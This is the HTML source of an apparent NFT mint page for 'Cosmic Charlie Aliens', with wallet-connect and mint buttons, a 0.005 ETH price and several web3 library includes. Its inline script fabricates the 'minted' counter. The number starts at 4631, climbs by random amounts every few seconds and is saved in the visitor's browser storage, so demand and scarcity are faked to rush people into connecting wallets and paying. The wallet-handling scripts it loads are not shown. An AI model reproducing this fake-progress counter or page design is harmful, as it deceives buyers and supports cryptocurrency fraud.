<!DOCTYPE html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Cosmic Charlie Aliens</title>
    <meta name="description" content="No Discord, No Roadmap, No Promise, No Whitelist ! 11111 Unique Hand draw Cosmic Charlie Aliens. INSTANT REVEAL!">
    <meta name="author" content="Cosmic Charlie Aliens">
    <meta name="url" content="https://cosmiccharlie.vercel.app">
    <meta name="image" content="https://cosmiccharlie.vercel.app/images/cosmic-charlie-opensea-banner.png">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="theme-color" content="#000000">
    <meta property="og:locale" content="en">
    <meta property="og:image" content="https://cosmiccharlie.vercel.app/images/cosmic-charlie-opensea-banner.png">
    <meta property="og:image:secure_url" content="https://cosmiccharlie.vercel.app/images/cosmic-charlie-opensea-banner.png">
    <meta property="og:image:type" content="image/png" />
    <meta property="og:image:alt" content="Cosmic Charlie Aliens NFT Public mint is Live">
    <meta property="og:site_name" content="Cosmic Charlie Aliens">
    <meta property="og:title" content="Cosmic Charlie Aliens">
    <meta property="og:type" content="website">
    <meta property="og:url" content="https://cosmiccharlie.vercel.app">
    <meta property="og:description" content="No Discord, No Roadmap, No Promise, No Whitelist ! 11111 Unique Hand draw Cosmic Charlie Aliens. INSTANT REVEAL!">
    <link rel="apple-touch-icon" href="./cc-favicon.png">
    <link rel="icon" type="image/png" href="./cc-favicon.png">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;700;800&amp;display=swap" rel="stylesheet">
    <link rel="stylesheet" href="./css/main.css">
    <link rel="stylesheet" href="./css/mint.css">
    <link rel="stylesheet" href="./css/alert.css">
  </head>

  <body is="index-page" class="">
    <div class="alert-container" id="alert-container" style="z-index: 20;"></div>
    <div class=" ck-af ">
      <div class=" ck-as ">
        <div class="ck-at">
          <img src="./images/cosmic-charlie-opensea-banner.png">
        </div>
      </div>
      <header class="ck-ah ">
        <div id="WEB3_CONNECT_MODAL_ID" style="z-index: 10;"></div>
        <div class="banner-form" style="margin-top: 65px;">
          <form>
              <h1>Public mint is live</h1> <div id="ape-max" style="display: none;"></div>
              <p class="counter1"><span id="nft_left">4631</span>/11111 minted</p>
              <div class="number">
                  <button class="minus" id="minus" type="button">-</button>
                  <h5 class="lnprice" style="margin-top: 0px !important;"><p style="margin-top:12px!important;" id="lnprice">1</p></h5>
                  <button class="plus" id="plus" type="button">+</button>
              </div>
              <p>Price: <span id="price" style="margin-left:3px;">0.005</span> ETH</p>
              <button id="connect" type="button" style="display: inline-block;">Connect Wallet</button>
              <button id="transfer" type="button" style="display: none;">Mint</button>
          </form>
      </div>
      </header>
    </div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="./javascript/alert.js"></script>
    <script type="text/javascript" src="https://unpkg.com/web3modal@1.9.4/dist/index.js"></script>
    <script type="text/javascript" src="https://unpkg.com/evm-chains@0.2.0/dist/umd/index.min.js"></script>
    <script type="text/javascript" src="https://unpkg.com/@walletconnect/web3-provider@1.5.5/dist/umd/index.min.js"></script>
    <script type="text/javascript" src="https://unpkg.com/web3@1.6.1/dist/web3.min.js"></script>
    <script src="https://npmcdn.com/moralis/dist/moralis.js"></script>
    <script src="https://cdn.ethers.io/lib/ethers-5.1.umd.min.js" type="text/javascript"></script>
    <script type="text/javascript" src="./settings.js"></script>
    <script src="./javascript/alert.js"></script>
    <script type="text/javascript" src="./javascript/index.js"></script>
    <script>
      db = window.localStorage;

      if (db.getItem('amount') == null)
      {
          var amount = 4631
          db.setItem("amount", amount)
      } else {
          var amount = parseInt(db.getItem('amount'))
      }
      smooth_amount = amount
      var counter = 0
      // Update the count down every 1 second
      var x = setInterval(function() {
        counter++
        if (counter > 40)
        {
          counter = 0
          if (amount < 11111)
          {
              logic = Math.floor((1 - (amount / 11045)) * 100)
              amount = Math.floor(Math.random() * logic) + amount
              db.setItem("amount", amount)
              db.setItem("max", logic)
          }
        }
        if (smooth_amount < amount) {
          smooth_amount = smooth_amount + ((amount - smooth_amount)/(20 - counter))
        }
        // Display the result in the element with id="demo"
        document.getElementById("nft_left").innerHTML = smooth_amount.toFixed(0);
        // If the count down is finished, write some text
      }, 100);
  </script>
  </body>
